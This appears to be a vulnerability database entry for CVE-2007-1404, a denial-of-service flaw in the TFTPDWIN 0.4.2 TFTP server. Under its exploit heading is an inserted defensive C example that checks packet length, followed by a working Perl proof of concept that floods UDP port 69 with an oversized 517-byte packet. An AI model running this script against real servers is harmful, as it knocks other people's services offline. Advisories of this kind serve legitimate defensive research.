ProSysInfo TFTP Server TFTPDWIN tftpd.exe Denial-of-Service Vulnerability

Vulnerability ID: 1112391    Vulnerability type: Unknown
Published: 2007-03-08    Updated: 2007-03-10
CVE ID: CVE-2007-1404    CNNVD-ID: CNNVD-200703-319
Platform: Windows    CVSS score: 7.3
|Vulnerability sources
https://www.exploit-db.com/exploits/3432
https://www.securityfocus.com/bid/86532
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-319
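|Vulnerability details
tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a recv_from call. NOTE: this issue might be related to CVE-2006-4948.
|Exploit (EXP)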
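The mitigation for the receive-path flaw described above is to bound the datagram length before any parsing. The following is an added example, not code from the original page or from ProSysInfo; it assumes POSIX sockets and the base TFTP packet limit of 516 bytes (RFC 1350, no blksize option), and the names `tftp_check` and `tftp_recv` are hypothetical.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>

#define TFTP_MAX_PACKET 516                   /* 2 opcode + 2 block number + 512 data */
#define TFTP_RECV_BUF   (TFTP_MAX_PACKET + 1) /* one spare byte exposes oversized datagrams */

enum tftp_verdict { TFTP_OK = 0, TFTP_TOO_SHORT, TFTP_TOO_LONG, TFTP_BAD_OPCODE };

/* Classify a datagram from the byte count the receive call reported. */
enum tftp_verdict tftp_check(const unsigned char *buf, size_t len)
{
    unsigned opcode;

    if (len > TFTP_MAX_PACKET)
        return TFTP_TOO_LONG;            /* e.g. a 517-byte packet */
    if (len < 4)
        return TFTP_TOO_SHORT;           /* smallest valid packet (ACK) is 4 bytes */
    opcode = ((unsigned)buf[0] << 8) | buf[1];
    if (opcode < 1 || opcode > 5)        /* RRQ, WRQ, DATA, ACK, ERROR */
        return TFTP_BAD_OPCODE;
    return TFTP_OK;
}

/* Receive one datagram into out[]; returns its length, or -1 if it is dropped.
 * recvfrom() never writes past sizeof buf, so a longer datagram is truncated
 * to 517 bytes and rejected by the length check instead of being parsed. */
ssize_t tftp_recv(int fd, unsigned char out[TFTP_MAX_PACKET],
                  struct sockaddr *from, socklen_t *fromlen)
{
    unsigned char buf[TFTP_RECV_BUF];
    ssize_t n = recvfrom(fd, buf, sizeof buf, 0, from, fromlen);

    if (n < 0 || tftp_check(buf, (size_t)n) != TFTP_OK)
        return -1;                       /* drop it and keep serving other clients */
    memcpy(out, buf, (size_t)n);
    return n;
}
```

On Winsock the same oversized datagram surfaces as a `recvfrom` error with `WSAEMSGSIZE` rather than a truncated count, so the error branch must also drop the packet and continue instead of terminating the server.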
#!/usr/bin/perl
#
#                            TFTPDWIN Server UDP DOS 0.4.2 POC 
#			            written By : Umesh Wanve (umesh_345@yahoo.com)
#	
#-------------------------------------------------------------------------------

# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which 
# could be exploited by remote or local attackers to execute arbitrary commands 
# or cause a denial of service. The flaw is triggered when an attacker sends a UDP packet of length more than 516 bytes.

#

#----------------------------Start of Code-------------------------------------



use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "69",
                                    Proto    => "UDP"))
{
    print $socket "A" x 517;
    sleep(1);
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:69\n";
}

# milw0rm.com [2007-03-08]
|Affected products
ProSysInfo Tftp Server Tftpdwin 0.4.2
|References

Source: MILW0RM
Name: 3432
Link: http://www.milw0rm.com/exploits/3432
Source: SECUNIA
Name: 24452
Link: http://secunia.com/advisories/24452
Source: OSVDB
Name: 33919
Link: http://osvdb.org/33919
Source: XF
Name: tftpdwin-recvfrom-dos(32886)
Link: http://xforce.iss.net/xforce/xfdb/32886